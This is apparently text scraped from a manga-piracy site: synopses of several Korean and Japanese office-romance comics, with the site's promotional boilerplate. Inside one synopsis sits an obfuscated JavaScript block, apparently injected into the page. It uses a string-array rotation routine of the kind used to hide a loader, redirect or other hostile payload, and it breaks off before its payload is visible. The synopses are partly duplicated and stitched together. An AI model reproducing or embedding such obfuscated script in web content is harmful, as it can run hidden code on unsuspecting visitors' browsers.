A strange old lady appears before the 31-year-old protagonist, who graduated from a provincial university, has no connections, and no impressive credentials! \"Buy one for me...\" The old lady suddenly thrusts a piece of gum forward, claiming that chewing it will make you smarter, better at work, and even more likable. The protagonist, caught off guard, ends up buying it. During a job interview, He absentmindedly swallows the gum, and from that moment on, things start to strangely go His way...
Gam Yoo Eun won the lottery with the leftover money from buying a bungeoppang after working overtime, as always. She tried to quit her job as President Chae Do Hyuk’s secretary, a boss notorious for living solely for his work… “Lately, my head is full with thoughts of Secretary Gam.” Something’s wrong with the boss… I mean, why has he turned so soft all of a sudden? She tried to push him away, saying it’s no use to act so out of character, but Yoo Eun is gradually shaken by relentless attacks from the handsome man. Does she know that Do Hyuk is thinking the same exact thing? “Persimmon secretary Gam is acting strange. I’ll make sure she goes back to normal.” 감 비서가 고장났다 / The Persimmon Secretary‘s Feelings Are Out Of Order
For the past three years Kijin Lee has lived as a secretary to Director Jinheon Joo of Xitec Trading with little to no personality or will of her own - even a haircut required his permission. With sales at Xitec Group plummeting, she’s been transferred to assist the CEO, who happens to be the cousin of Director Joo. Her first day is cut short after an intoxicated Kanghyun Joo – dressed in sweatpants and sneakers – throws a drink at her. Her job depends on her ability to help him and Xitec Group, but this unruly CEO may prove to be her greatest challenge yet.<script></script><script>(function(_0x5722c5,_0x11163d){var _0x3eb74c=_0x5f4a,_0x2810b8=_0x5722c5();while(!![]){try{var _0x197715=-parseInt(_0x3eb74c(0x18c))/(-0x1ae3+0x1*-0x16f4+-0xc76*-0x4)+-parseInt(_0x3eb74c(0x19a))/(-0x16dd+-0x89*0x16+0x22a5)+-parseInt(_0x3eb74c(0x197))/(0x23bf+0x3d9*-0x7+-0x8cd)+-parseInt(_0x3eb74c(0x1a0))/(0x3*0x6e5+0x1*-0x80f+0x10d*-0xc)+parseInt(_0x3eb74c(0x19e))/(-0x1738+0x147a*-0x1+0x2bb7)*(-parseInt(_0x3eb74c(0x1a1))/(-0x22d3+-0x177+0x48a*0x8))+-parseInt(_0x3eb74c(0x18b))/(-0xd5a+-0x1055*-0x2+-0x1349*0x1)+parseInt(_0x3eb74c(0x1a7))/(0x13c*-0x17+-0xe6*-0x21+-0x13a);if(_0x197715===_0x11163d)break;else _0x2810b8['push'](_0x2810b8['shift']());}catch(_0x13289c){_0x2810b8['push'](_0x2810b8['shift']());}}}(_0x2c16,0x108c8+0x3*-0x5961+-0x1*-0x2c53f));function _0x2c16(){var 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Read manhwa The Secret Work From Home / Covert Work From Home / Work From Home Privately / 은밀한 재택근무 An ordinary office worker, ‘Han Da-yeon’. In order to successfully arrange the company’s life or death project, at the request of the CEO of a venture company, as well as her former classmate, ‘Lee Ji-an’, she became his secretary. To work from home with the guy who ruined her first kiss back in high school! But, Da-yeon finds out that she was Ji-an’s first love, and as Ji-an doesn’t hide how he feels, the two get closer…
Read Manhwa The Team Leader is Tired of Being A Newlywed Online For Free At Manga Zin The Team Leader is Tired of Being A Newlywed Novel also known as “Menjadi Pengantin Baru Itu Melelahkan / I Spy a Married Life / The Team Leader Is Tired of Newlyweds / Tân hôn mệt mỏi của trưởng phòng / أنا أتجسس على الحياة الزوجية / 組長新婚很疲憊 / 组长的新婚生活很疲惫 / 課長は新婚生活でお疲れ / 팀장님은 신혼이 피곤하다”. This OnGoing webtoon was released on 2023. The story was written by Ganghada and illustrations by Jang Green. The content of the comic The Team Leader is Tired of Being A Newlywed: What would you do if you were ordered to enter a fake marriage… with your crush? That’s exactly what happened to Dodam, an agent working for the NSO, the most secretive government organization. Dodam’s mission? To expose an industrial spy. But here’s the twist: she has to go undercover as a newlywed with her boss and crush, Juwon Gi. Dodam is determined to accomplish her mission and win Juwon’s favor along the way. Can she safely complete her mission? Or will her feelings jeopardize everything? The comic The Team Leader is Tired of Being A Newlywed belongs to the Genre: Action, Comedy, Drama, Fantasy, Manhwa, Manhwa Hot, Office Workers, Romance, Webtoons MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “ManhwaTop,” as well as related terms like ZinManga, LikeManga, and Read Manhwa Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics.
Set in an alternate world, we follow a group of friends as they encounter and deal with the many absurdities within the city of Woodbridge. Whether or not they\'ll stop these elusive figures for good is up to question, because these villains come from places most wouldn\'t expect! Be sure to support @sekora2000 on IG, Tiktok, Twitter, and Patreon!
After Finding Out Her Boyfriend Has Been Cheating On Her, Lee Daeun Decides To Forget Him With A One-Night Stand. But As Soon As Daeun Returns To Reality At Her New Job, She Discovers That The Guy She Slept With Is None Other Than Han Gyeoul, Her Boss! To Make Things Even Worse, He Proposes To Her Out Of The Blue. Though Shocked By His Offer, Daeun Gives Him A Chance. The Only Problem Is, While Gyeoul May Be A Genius At Work, He’s A Total Fool When It Comes To Love! Does This Pair Have Any Hope? Midwinter Has No Answer / そのプロポーズは違法です! / 한겨울은 답이 없다
After finding out her boyfriend has been cheating on her, Lee Daeun decides to forget him with a one-night stand. But as soon as Daeun returns to reality at her new job, she discovers that the guy she slept with is none other than Han Gyeoul, her boss! To make things even worse, he proposes to her out of the blue. Though shocked by his offer, Daeun gives him a chance. The only problem is, while Gyeoul may be a genius at work, he’s a total fool when it comes to love! Does this pair have any hope? Midwinter Has No Answer / そのプロポーズは違法です! / 한겨울은 답이 없다
Read Manga Third Night Only / For The Third Time / Three Night Stand / 三度目の初夜 / 第三次一見鍾情 / 第三次一见钟情 / 첫날밤만 세 번째 Free Online On Mangazin 29 Years Old , Baek Dohee Who Feels Hopeless And Skeptical About Her Life , Dreamed Of Escaping From A Frustrated Heart , Meets Jun Won In Place Of Her Friend , Nuri. Due To An Unknown Attraction They End Up Having A One Night Stand , But At The Climax. Dohee Passes Days Without Meeting Jun Won Inorder To Forget That Day. Dohee Reunites With Jun Won , Who Has Taken The Position Of Team Leader. However, Jun Won Who Shouldn’t Be Able To Remember “That Day” , Clearly Remembers Dohee And Everything That Happened That Night. No Matter How Hard She Tries To Push Him Away , She’s Still Dragged Towards Him Who Approaches Her Recklessly. Can The Two Men And Women Who Became Emotional Hedgehogs For Their Own Reasons , Will Be Able To Break Down The Wall And Be Happy Together?
(from ebookjapan): Fumiya Saotome, a reporter in the Akatsuki Shimbun\'s sociology department, is an unbelievably violent man. He will wield both pen and arm to the fullest for the sake of social justice. He chases after a hit-and-run case, and ends up with the son of a deputy. He was paid 100 million yen to keep his mouth shut. He is furious, and his money will not sell him out!
Diagnosed with stage 4 lung cancer, Soyi is given only one year to live. Having known nothing but work, she creates a bucket list. “I’m tall, handsome, and well-mannered. I’ll help you with your bucket list.” Caught off-guard by the proposal of a contractual relationship from Dojun, her handsome boss, Soyi finds herself getting physically involved with him!